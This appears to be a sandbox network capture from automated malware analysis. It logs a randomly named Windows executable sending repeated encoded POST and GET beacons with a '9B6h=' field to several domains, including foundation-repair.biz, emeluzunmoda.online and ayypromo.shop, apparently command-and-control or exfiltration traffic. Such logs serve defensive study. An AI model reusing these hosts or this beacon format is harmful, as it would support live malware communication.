                                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==
                                                                                                                                                                                                                                                              set-cookie: parking_session=32e3ccf8-df8d-483f-a613-9dc1098ad73a; expires=Wed, 09 Oct 2024 11:54:33 GMT; path=/
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Oct 9, 2024 13:39:33.146894932 CEST | 554 | IN
                                                                                                                                                                                                                                                              Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzJlM2NjZjgtZGY4ZC00ODNmLWE2MTMtOWRjMTA5OGFkNzNhIiwicGFnZV90aW1lIjoxNzI4NDczOTczLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZm91bmRhdGlvbi1yZXB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.11.20 | 49776 | 199.59.243.227 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:39:35.669955969 CEST | 1289 | OUT | POST /enra/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.foundation-repair.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.foundation-repair.biz
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.foundation-repair.biz/enra/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=JshyfeaUeVAP7tMJGNVnIZNpTaGcTyZ5eRvcZnBnqcxBh9JTpKWUzDVH2TtmLaSFzPgkqydTqZmB6mn7PpqhB0kUa/YeuM8FuANnmJpr7Rx/rhtUsZM5O9CitQERYufhb909H0RORkTCp4MAgt+ImCQQpUrBDBqrmdJXJSQuCQOcVrsxyv2LcGWrEIcViH42WhBMEw3EN5XLK1Dcv/8sB15qnf1RtCyKD8lbNG/DF5+gY+DsQ+4rpVN2zPqiacV8Nnp1mZ0Tbrd/vs7kBZCBv7OOWzvAlc/8abhV/6pbo8mJiHmfyBtvM8W+9SihZKKQTaHbKvW8IAgGY+BourjsFAy32MD8z2VXO6/Dsuhopwoa4U/QDlcegLezu+mXzoPNgMVr0QGBmGHUotEiwqVcr3+NJmmtaI591strWiB4PeIMQ7c3P4ql2gw8u+LwCAraSv8b9lanRj7ZckEdVW/G9jiRE8OoxS6P3Z+tSG7bfkzryFVInWyyvJPUGe9JF2YZQ7W5PBCeEgrbf7zH9zVxYxJeyIf2qwJbESYXzJqr6F1GiOY/+28YrSkxzXzwTwKXC0koG4HfcOU1UwGtZcXe/0SkwdxVIMK9pmpdH+cyrhd3mW4j93kNpqju9E4qWcDMBfDf+Q
Oct 9, 2024 13:39:35.670006037 CEST | 2578 | OUT
                                                                                                                                                                                                                                                              Data Ascii: AmY5P+awy9yfVi3LmEqZkaMZ9UNLS9kwly5Nn/TSkLZKiBDpS4ICfgjlDURB++W3XgVn7gCPVSdozO7ssGemaLy0yv7/vZiYaGPeucazYPl9Zky/UKylddZRWRxF3WqeCStu69yEx+3+Xgaykwmcd74Ai3EAPPxNdfDYoeTbnemERo1afWSapz4Eg+zdpjdm3/63WC+PQLH/UST+ZZb2rWaaH37VuIhVwYKJrMnUUlmrn2Zx7G8
Oct 9, 2024 13:39:35.670054913 CEST | 4140 | OUT
                                                                                                                                                                                                                                                              Data Ascii: 0wfEvF9jIILt85WSVOxXvOhE0kVw4QUZZPvKKDtakVdVyisWkI5Hidl9SMNidE67oDa9qnue3zczm16jJctEeSGiZToqKXpE1AhPupbiYgcyaTPoj/v381hFRFXI/6FewzdCNw9yBWjek9rsjULByge5lz31AIQ9ZZ1mkLkkPAdhGuCYMRhV63vSQviONCt6cCrgZEFRI5/kj9+i/822L62pzrZEk/aNrB/7mO93mZuYRIqQMnc
Oct 9, 2024 13:39:35.772002935 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:39:35 GMT
                                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              content-length: 1154
                                                                                                                                                                                                                                                              x-request-id: 1fc87c9d-e1e7-40a6-a5cc-d2d320cc1ece
                                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==
                                                                                                                                                                                                                                                              set-cookie: parking_session=1fc87c9d-e1e7-40a6-a5cc-d2d320cc1ece; expires=Wed, 09 Oct 2024 11:54:35 GMT; path=/
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Oct 9, 2024 13:39:35.772012949 CEST | 554 | IN
                                                                                                                                                                                                                                                              Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWZjODdjOWQtZTFlNy00MGE2LWE1Y2MtZDJkMzIwY2MxZWNlIiwicGFnZV90aW1lIjoxNzI4NDczOTc1LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZm91bmRhdGlvbi1yZXB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.11.20 | 49777 | 199.59.243.227 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:39:38.291410923 CEST | 558 | OUT | GET /enra/?9B6h=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.foundation-repair.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:39:38.392899990 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:39:37 GMT
                                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              content-length: 1486
                                                                                                                                                                                                                                                              x-request-id: 36edc8d3-c331-457b-81e5-d6bff0cbd24f
                                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_sdEb7As6bGPjy7ij6cYyZHF0PALriXfmYgO9BnyQs+FcGK2R9jqaqAM/RJwkctNdgoiRZoVsljps3wlOYZu94A==
                                                                                                                                                                                                                                                              set-cookie: parking_session=36edc8d3-c331-457b-81e5-d6bff0cbd24f; expires=Wed, 09 Oct 2024 11:54:38 GMT; path=/
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_sdEb7As6bGPjy7ij6cYyZHF0PALriXfmYgO9BnyQs+FcGK2R9jqaqAM/RJwkctNdgoiRZoVsljps3wlOYZu94A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Oct 9, 2024 13:39:38.392998934 CEST | 886 | IN |
                                                                                                                                                                                                                                                              Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzZlZGM4ZDMtYzMzMS00NTdiLTgxZTUtZDZiZmYwY2JkMjRmIiwicGFnZV90aW1lIjoxNzI4NDczOTc4LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZm91bmRhdGlvbi1yZXB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.11.20 | 49778 | 85.159.66.93 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:39:44.165530920 CEST | 832 | OUT | POST /c0kl/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.emeluzunmoda.online
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.emeluzunmoda.online
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.emeluzunmoda.online/c0kl/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=Nzxx265ZqDHypPP5C4f6NhtCE6xS2x70A2BbzKm61YsS5vNzxh1BwdG/NvPDMhPfme5K9tllqsfI4bVppk84msD5oBzmSbVkvDiRouMSQhnCnnxlksZV0taN4mkJB9CT2YJvGt41GIM69AhhYYM7O4eJZ8y+Ip6t02vSGcPOPx7kQf+sceSkMAw+/rtTXOZsjg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.11.20 | 49779 | 85.159.66.93 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:39:46.909287930 CEST | 852 | OUT | POST /c0kl/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.emeluzunmoda.online
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.emeluzunmoda.online
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.emeluzunmoda.online/c0kl/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=Nzxx265ZqDHyov/5AfL6cRtFKaxS5R7wA2FbzLSQ1rYS5ORzwg1BzdG/FPPMIhPImZx09odlqsLI4fdppTo/3sD/iRzoWbVkvDiRouY0Qh/CnWBlkJtS6NaKxGkJXNCX2YIKGpYTGKE69BRhYJM6dYfCGszxJpj07SWkG//iL0rncpv2BsmAPTsM7bU7VMY3+q6sbOK2gZV3lTH9uyL9AHU=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.11.20 | 49780 | 85.159.66.93 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:39:49.658235073 CEST | 2578 | OUT | POST /c0kl/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.emeluzunmoda.online
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.emeluzunmoda.online
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.emeluzunmoda.online/c0kl/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:39:49.658308983 CEST | 5423 | OUT |
                                                                                                                                                                                                                                                              Data Ascii: 0glPtUOOQDKd1iUZ18HS9RCv8ovgotoWtnMlPVFGAeHLV4ZL8P5vApsx/agZl/wrQ84AGPrlzRExlic9OPFs2oQb/lky5yyJh0+zV4pCn//yWSTbfph/OBCDzKZ0T6DJyJsdNhu95NoMc3dty9+zBBB0t60nolTvOjq9xZtd9NkPj/3+09Q9psddPnRk33V5rdp7r3YrHkgu6zlEn09yPvwZEp1j4L5yjMKyfcxqBe+cNjj8iMR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.11.20 | 49781 | 85.159.66.93 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:39:52.406431913 CEST | 556 | OUT | GET /c0kl/?FlS=3ldH5dkH-dBLf&9B6h=AxZR1MxN1yP04/KkfJjqNmRSK4d8g2rgChYpgYbN8LwS/ds0321h0MeEKpKCay63h/JFzZR/nOfV69IulQUTnqrvqwrwGbRyvD357dhiEinhnUxdss5AyLg= HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.emeluzunmoda.online
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:39:52.620397091 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: nginx/1.14.1
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:52 GMT
                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Rate-Limit-Limit: 5s
                                                                                                                                                                                                                                                              X-Rate-Limit-Remaining: 19
                                                                                                                                                                                                                                                              X-Rate-Limit-Reset: 2024-10-09T11:39:57.5130416Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.11.20 | 49782 | 176.57.64.102 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:39:58.115968943 CEST | 814 | OUT | POST /mktg/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.ayypromo.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.ayypromo.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.ayypromo.shop/mktg/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=5RyFs6/ejjUoUnIudc9Gaint4FpggJYnd4MvYIT7xcrcfnUiAChQFI5IaXs8SmaBoCQxQ+hQ1EYbbSBKAHKHT4kTgcSFg1D/tEnJC7NrfK3lkpXMh00P8Kx3dBLcrU+FdDTCFi9lHx8HOrcjL5o6X2r3SWayOkC/b48KvahnsAApdF7r7/i6iOfCTjzVIs95zg==
Oct 9, 2024 13:39:58.385385990 CEST | 1066 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: ddos-guard
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: __ddg8_=ep8vbQ2A7sjFh3el; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 11:59:58 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg9_=191.96.150.187; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 11:59:58 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg10_=1728473998; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 11:59:58 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg1_=dVDZzNIF1y2HLqrrm2Ip; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 09-Oct-2025 11:39:58 GMT
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:57 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Content-Length: 340
                                                                                                                                                                                                                                                              Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                                                                                                                                                                              ETag: "154-56d5bbe607fc0"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.11.20 | 49783 | 176.57.64.102 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:40:00.775222063 CEST | 834 | OUT | POST /mktg/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.ayypromo.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.ayypromo.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.ayypromo.shop/mktg/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=5RyFs6/ejjUoSEQubPlGbCni3lpg75Yjd4AvYMjrxPfcfGkiBGVQEI5IV3s5N2aOoCdOQ/NQ1EcbbTxKB0SIcIkV4sSL9lD/tEnJC/lBfLTlkZnMgV0A2qx0NRLcvU+ZdDTwFncOH04HOrMjLoo5Z2r1MmbkN1m1Vrw8nLVOgwpRcTqxmNWehdDwXTK9Ku8iupUqVmtaKgUo5yZ90hkBAJs=
Oct 9, 2024 13:40:01.048105001 CEST | 1066 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: ddos-guard
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: __ddg8_=5mUOWJgRNxqEpNlA; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:00 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg9_=191.96.150.187; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:00 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg10_=1728474000; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:00 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg1_=2rXAhEpSnOUQn1VCBC4Z; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 09-Oct-2025 11:40:00 GMT
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:40:00 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Content-Length: 340
                                                                                                                                                                                                                                                              Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                                                                                                                                                                              ETag: "154-56d5bbe607fc0"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
43 | 192.168.11.20 | 49784 | 176.57.64.102 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:40:03.430509090 CEST | 2578 | OUT | POST /mktg/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.ayypromo.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.ayypromo.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.ayypromo.shop/mktg/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Data Ascii: 9B6h= [TRUNCATED]
Oct 9, 2024 13:40:03.430572987 CEST | 5405 | OUT |
                                                                                                                                                                                                                                                              Data Ascii: YXdi6Kuu5dEzqkHxmgP67dzoKJ86yE4giF3FZnXiU8CWG+iPsabnH47gvNVkUHYQdTRsFQvG8Ep979RN7ghUn2orwMTvVC5BATDCRv+wVOx4NhcErPzN9I9+51wuHcw/G8OHZVAuYoNLkdJMjsSryEgsKOB8yTUNy0jdf9eBXvAVRZj5cf3U1Tgu9z7mLmdWHMD3t3Af/m0YqV7EP88HJLFi5jza8WVuLR0o7uPqhsEHrEfoICM
Oct 9, 2024 13:40:03.694143057 CEST | 1066 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: ddos-guard
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: __ddg8_=hG4kKGcqtMixKh4C; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:03 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg9_=191.96.150.187; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:03 GMT
